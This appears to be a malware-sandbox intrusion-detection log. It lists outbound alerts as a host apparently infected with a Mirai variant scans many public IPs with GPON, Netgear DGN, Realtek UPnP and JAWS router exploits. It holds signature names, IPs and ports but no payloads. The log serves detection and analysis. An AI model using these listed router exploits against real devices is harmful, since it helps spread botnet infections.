                                                                        2024-12-06T00:37:28.433848+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360798112.153.207.1158080TCP
                                                                        2024-12-06T00:37:28.434662+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337098138.112.67.10080TCP
                                                                        2024-12-06T00:37:28.846988+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338394118.202.244.6680TCP
                                                                        2024-12-06T00:37:28.850561+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356980130.173.78.16380TCP
                                                                        2024-12-06T00:37:28.853103+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356654137.59.53.2158080TCP
                                                                        2024-12-06T00:37:28.856735+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23401165.169.92.2205555TCP
                                                                        2024-12-06T00:37:28.862512+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352536174.193.163.938080TCP
                                                                        2024-12-06T00:37:28.881708+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357302111.190.5.13680TCP
                                                                        2024-12-06T00:37:28.890025+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353064215.52.243.14749152TCP
                                                                        2024-12-06T00:37:28.890393+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233912831.143.91.20049152TCP
                                                                        2024-12-06T00:37:28.895478+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344612135.5.55.7080TCP
                                                                        2024-12-06T00:37:28.909985+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335770209.123.202.12580TCP
                                                                        2024-12-06T00:37:28.914341+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352706119.70.198.717574TCP
                                                                        2024-12-06T00:37:28.920864+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355100160.235.41.24652869TCP
                                                                        2024-12-06T00:37:28.921957+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353608146.24.201.1107574TCP
                                                                        2024-12-06T00:37:28.922688+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233587252.19.192.2749152TCP
                                                                        2024-12-06T00:37:28.923426+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235692227.135.40.20680TCP
                                                                        2024-12-06T00:37:28.923793+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235670035.182.130.1452869TCP
                                                                        2024-12-06T00:37:28.924916+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346438161.57.64.24580TCP
                                                                        2024-12-06T00:37:28.925646+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358016110.132.229.5580TCP
                                                                        2024-12-06T00:37:28.925646+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358016110.132.229.5580TCP
                                                                        2024-12-06T00:37:28.926017+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2337370104.167.229.11452869TCP
                                                                        2024-12-06T00:37:28.926387+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235164486.250.36.977574TCP
                                                                        2024-12-06T00:37:28.926761+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2335456180.201.171.918080TCP
                                                                        2024-12-06T00:37:28.927853+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353352158.47.178.1168080TCP
                                                                        2024-12-06T00:37:28.935472+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359038212.113.242.3280TCP
                                                                        2024-12-06T00:37:28.936203+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23547701.43.165.2155555TCP
                                                                        2024-12-06T00:37:29.088443+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233768625.107.103.68080TCP
                                                                        2024-12-06T00:37:29.089454+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2342798171.151.107.15380TCP
                                                                        2024-12-06T00:37:29.090246+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2340470192.152.41.1938080TCP
                                                                        2024-12-06T00:37:29.787533+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342246120.89.24.12680TCP
                                                                        2024-12-06T00:37:29.865130+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234565460.159.210.168080TCP
                                                                        2024-12-06T00:37:29.866238+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233850219.180.163.10180TCP
                                                                        2024-12-06T00:37:29.866616+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334114187.42.40.5349152TCP
                                                                        2024-12-06T00:37:29.868443+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347898125.119.184.178080TCP
                                                                        2024-12-06T00:37:29.869176+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235074631.104.21.525555TCP
                                                                        2024-12-06T00:37:29.869545+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344590166.140.109.22280TCP
                                                                        2024-12-06T00:37:29.871385+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233824692.230.178.2680TCP
                                                                        2024-12-06T00:37:29.871752+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233918633.8.198.2152869TCP
                                                                        2024-12-06T00:37:29.872488+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351938145.222.196.2385555TCP
                                                                        2024-12-06T00:37:29.880122+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235844031.167.96.24249152TCP
                                                                        2024-12-06T00:37:29.912653+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234559848.100.225.208080TCP
                                                                        2024-12-06T00:37:29.913028+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236035082.130.80.2387574TCP
                                                                        2024-12-06T00:37:29.919845+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235579211.95.223.1968080TCP
                                                                        2024-12-06T00:37:29.920570+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235570432.37.204.7880TCP
                                                                        2024-12-06T00:37:29.920570+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235570432.37.204.7880TCP
                                                                        2024-12-06T00:37:29.921318+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350650112.164.49.4280TCP
                                                                        2024-12-06T00:37:29.921318+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350650112.164.49.4280TCP
                                                                        2024-12-06T00:37:29.929293+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235738021.184.171.12080TCP
                                                                        2024-12-06T00:37:29.929293+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235738021.184.171.12080TCP
                                                                        2024-12-06T00:37:30.854814+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339810179.34.222.38080TCP
                                                                        2024-12-06T00:37:30.863484+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23511866.94.100.12452869TCP
                                                                        2024-12-06T00:37:30.870719+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234482473.0.89.4980TCP
                                                                        2024-12-06T00:37:30.871086+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234763029.122.56.1038080TCP
                                                                        2024-12-06T00:37:30.871445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334846207.81.166.16249152TCP
                                                                        2024-12-06T00:37:30.873400+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340052160.228.159.1180TCP
                                                                        2024-12-06T00:37:30.873400+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340052160.228.159.1180TCP
                                                                        2024-12-06T00:37:30.873770+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349836168.124.134.24380TCP
                                                                        2024-12-06T00:37:30.875239+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234439817.105.148.3552869TCP
                                                                        2024-12-06T00:37:30.875606+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233908424.143.8.478080TCP
                                                                        2024-12-06T00:37:30.876707+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352940186.99.110.14480TCP
                                                                        2024-12-06T00:37:30.876707+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352940186.99.110.14480TCP
                                                                        2024-12-06T00:37:30.877448+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23445443.155.76.23152869TCP
                                                                        2024-12-06T00:37:30.877820+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235368879.90.94.23049152TCP
                                                                        2024-12-06T00:37:30.880378+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352718117.115.249.8780TCP
                                                                        2024-12-06T00:37:30.880748+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23539689.69.156.1117574TCP
                                                                        2024-12-06T00:37:30.881117+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337760209.195.134.2128080TCP
                                                                        2024-12-06T00:37:30.882208+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233963839.79.106.2549152TCP
                                                                        2024-12-06T00:37:30.908288+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338878141.86.150.19080TCP
                                                                        2024-12-06T00:37:30.914479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350140123.98.76.11380TCP
                                                                        2024-12-06T00:37:30.920301+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333120118.165.85.5480TCP
                                                                        2024-12-06T00:37:30.920301+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333120118.165.85.5480TCP
                                                                        2024-12-06T00:37:30.926106+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347804101.65.198.25480TCP
                                                                        2024-12-06T00:37:30.926476+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23585902.214.23.1978080TCP
                                                                        2024-12-06T00:37:30.926857+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2357474205.139.0.2368080TCP
                                                                        2024-12-06T00:37:30.933379+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233675831.0.16.880TCP
                                                                        2024-12-06T00:37:30.933752+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333042146.161.76.567574TCP
                                                                        2024-12-06T00:37:30.934121+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234313251.96.15.11449152TCP
                                                                        2024-12-06T00:37:30.942833+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360066201.77.183.3880TCP
                                                                        2024-12-06T00:37:31.847906+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234276096.105.104.2952869TCP
                                                                        2024-12-06T00:37:31.876170+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234532260.115.18.1128080TCP
                                                                        2024-12-06T00:37:31.876537+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234893861.217.7.21980TCP
                                                                        2024-12-06T00:37:31.884860+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351206222.159.109.1765555TCP
                                                                        2024-12-06T00:37:31.885593+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23369342.186.161.1988080TCP
                                                                        2024-12-06T00:37:31.885966+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342362219.123.46.828080TCP
                                                                        2024-12-06T00:37:31.888495+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234811436.103.157.13080TCP
                                                                        2024-12-06T00:37:31.888495+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234811436.103.157.13080TCP
                                                                        2024-12-06T00:37:31.933995+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234848423.235.225.1925555TCP
                                                                        2024-12-06T00:37:31.934366+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352758210.134.5.10580TCP
                                                                        2024-12-06T00:37:31.934366+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352758210.134.5.10580TCP
                                                                        2024-12-06T00:37:31.935096+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344930172.160.19.1645555TCP
                                                                        2024-12-06T00:37:31.935464+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233771269.222.154.1965555TCP
                                                                        2024-12-06T00:37:31.942709+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354276151.243.65.1788080TCP
                                                                        2024-12-06T00:37:31.943080+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339840123.117.143.1638080TCP
                                                                        2024-12-06T00:37:31.943449+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338150180.23.193.19380TCP
                                                                        2024-12-06T00:37:31.944192+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348400153.132.165.2198080TCP
                                                                        2024-12-06T00:37:31.944559+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339960120.95.97.2478080TCP
                                                                        2024-12-06T00:37:31.945290+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23471162.95.7.19552869TCP
                                                                        2024-12-06T00:37:31.946026+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234750691.220.86.10149152TCP
                                                                        2024-12-06T00:37:31.946394+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340328163.112.148.525555TCP
                                                                        2024-12-06T00:37:31.946764+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335114124.231.148.980TCP
                                                                        2024-12-06T00:37:31.946764+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335114124.231.148.980TCP
                                                                        2024-12-06T00:37:31.947136+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334496149.249.135.180TCP
                                                                        2024-12-06T00:37:31.947136+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334496149.249.135.180TCP
                                                                        2024-12-06T00:37:31.947508+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359724131.52.222.21480TCP
                                                                        2024-12-06T00:37:31.948237+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235418058.51.244.7180TCP
                                                                        2024-12-06T00:37:31.948237+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235418058.51.244.7180TCP
                                                                        2024-12-06T00:37:31.949328+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343254167.41.169.18680TCP
                                                                        2024-12-06T00:37:31.949328+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343254167.41.169.18680TCP
                                                                        2024-12-06T00:37:34.876129+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348240182.20.57.1988080TCP
                                                                        2024-12-06T00:37:34.877230+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23441502.191.60.765555TCP
                                                                        2024-12-06T00:37:34.878701+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235801275.130.28.8249152TCP
                                                                        2024-12-06T00:37:34.887055+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339364140.197.218.3880TCP
                                                                        2024-12-06T00:37:34.887055+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339364140.197.218.3880TCP
                                                                        2024-12-06T00:37:34.893586+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339302130.211.189.24680TCP
                                                                        2024-12-06T00:37:34.900128+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233413687.56.8.517574TCP
                                                                        2024-12-06T00:37:34.926639+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341904199.32.40.928080TCP
                                                                        2024-12-06T00:37:34.932474+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234124846.64.101.655555TCP
                                                                        2024-12-06T00:37:34.933215+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233960083.65.122.22280TCP
                                                                        2024-12-06T00:37:34.933215+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233960083.65.122.22280TCP
                                                                        2024-12-06T00:37:34.933584+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358938212.75.2.15280TCP
                                                                        2024-12-06T00:37:34.933584+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358938212.75.2.15280TCP
                                                                        2024-12-06T00:37:34.933957+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235163866.41.100.2058080TCP
                                                                        2024-12-06T00:37:34.937951+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2340852163.125.137.1268080TCP
                                                                        2024-12-06T00:37:34.938323+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2349160131.7.64.22052869TCP
                                                                        2024-12-06T00:37:34.938692+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336648169.157.43.12849152TCP
                                                                        2024-12-06T00:37:35.858965+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2348902204.107.55.19552869TCP
                                                                        2024-12-06T00:37:35.860059+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234550625.28.20.23052869TCP
                                                                        2024-12-06T00:37:35.860431+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236003856.187.33.11180TCP
                                                                        2024-12-06T00:37:35.860431+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236003856.187.33.11180TCP
                                                                        2024-12-06T00:37:35.862249+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.236007076.89.90.9680TCP
                                                                        2024-12-06T00:37:35.862976+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236070098.208.13.1325555TCP
                                                                        2024-12-06T00:37:35.865162+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235970061.241.212.21680TCP
                                                                        2024-12-06T00:37:35.865162+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235970061.241.212.21680TCP
                                                                        2024-12-06T00:37:35.865534+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2344720201.189.210.1288080TCP
                                                                        2024-12-06T00:37:35.865897+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348424193.85.195.20180TCP
                                                                        2024-12-06T00:37:35.866268+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234333074.182.50.16580TCP
                                                                        2024-12-06T00:37:35.866643+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235456041.229.171.1348080TCP
                                                                        2024-12-06T00:37:35.868109+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2355260156.217.155.12480TCP
                                                                        2024-12-06T00:37:35.868478+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336944206.201.29.1697574TCP
                                                                        2024-12-06T00:37:35.887696+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360498176.11.39.14249152TCP
                                                                        2024-12-06T00:37:35.888063+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334964142.84.25.5980TCP
                                                                        2024-12-06T00:37:35.888063+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334964142.84.25.5980TCP
                                                                        2024-12-06T00:37:35.888813+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336864199.180.164.2178080TCP
                                                                        2024-12-06T00:37:35.889898+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.235208660.219.113.17752869TCP
                                                                        2024-12-06T00:37:35.901870+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337110208.163.47.17080TCP
                                                                        2024-12-06T00:37:35.902604+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235641474.19.36.3180TCP
                                                                        2024-12-06T00:37:35.902604+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235641474.19.36.3180TCP
                                                                        2024-12-06T00:37:35.902971+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341604179.228.190.11380TCP
                                                                        2024-12-06T00:37:37.898232+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233590272.133.244.1280TCP
                                                                        2024-12-06T00:37:37.898603+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348024109.21.59.11949152TCP
                                                                        2024-12-06T00:37:37.900433+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358796135.195.106.6680TCP
                                                                        2024-12-06T00:37:37.900803+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360818180.14.14.16249152TCP
                                                                        2024-12-06T00:37:37.901173+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233324046.154.107.1075555TCP
                                                                        2024-12-06T00:37:37.905186+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340188114.97.132.4680TCP
                                                                        2024-12-06T00:37:37.905186+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340188114.97.132.4680TCP
                                                                        2024-12-06T00:37:37.905555+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233372278.12.225.5249152TCP
                                                                        2024-12-06T00:37:37.905925+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352316135.126.129.98080TCP
                                                                        2024-12-06T00:37:37.920099+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2339622157.36.53.2980TCP
                                                                        2024-12-06T00:37:37.937626+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233790695.84.60.19780TCP
                                                                        2024-12-06T00:37:37.937626+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233790695.84.60.19780TCP
                                                                        2024-12-06T00:37:37.939446+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234915878.54.102.478080TCP
                                                                        2024-12-06T00:37:37.939816+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234313412.192.0.38080TCP
                                                                        2024-12-06T00:37:37.940182+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235219875.39.160.1780TCP
                                                                        2024-12-06T00:37:38.857459+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2338012122.118.90.23352869TCP
                                                                        2024-12-06T00:37:38.859279+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235877449.141.32.6349152TCP
                                                                        2024-12-06T00:37:38.862917+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333480151.38.93.1658080TCP
                                                                        2024-12-06T00:37:38.863286+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351358201.179.154.580TCP
                                                                        2024-12-06T00:37:38.864023+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2360986200.243.100.16480TCP
                                                                        2024-12-06T00:37:38.864392+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2346218211.84.185.22652869TCP
                                                                        2024-12-06T00:37:38.864764+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2348972118.0.61.2228080TCP
                                                                        2024-12-06T00:37:38.865137+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234806662.124.9.24152869TCP
                                                                        2024-12-06T00:37:38.865875+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339174216.56.177.1018080TCP
                                                                        2024-12-06T00:37:38.867702+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344552159.3.235.1327574TCP
                                                                        2024-12-06T00:37:38.876071+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344464182.254.2.9780TCP
                                                                        2024-12-06T00:37:38.910588+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.236000814.93.121.15080TCP
                                                                        2024-12-06T00:37:38.916768+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2359268218.24.88.4280TCP
                                                                        2024-12-06T00:37:38.918225+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2342310112.200.159.15252869TCP
                                                                        2024-12-06T00:37:39.346021+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23358824.167.46.13880TCP
                                                                        2024-12-06T00:37:39.346185+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2360250197.135.110.128080TCP
                                                                        2024-12-06T00:37:39.346397+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343242136.179.98.22580TCP
                                                                        2024-12-06T00:37:39.353628+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233969428.121.234.17180TCP
                                                                        2024-12-06T00:37:39.447246+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234108097.161.172.1348080TCP
                                                                        2024-12-06T00:37:39.463019+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338394118.202.244.6680TCP
                                                                        2024-12-06T00:37:39.463124+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356934200.25.215.13380TCP
                                                                        2024-12-06T00:37:39.494232+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356654137.59.53.2158080TCP
                                                                        2024-12-06T00:37:39.494333+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2356980130.173.78.16380TCP
                                                                        2024-12-06T00:37:39.840245+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359168146.221.201.16180TCP
                                                                        2024-12-06T00:37:39.840245+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359168146.221.201.16180TCP
                                                                        2024-12-06T00:37:39.843997+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235510849.157.167.18380TCP
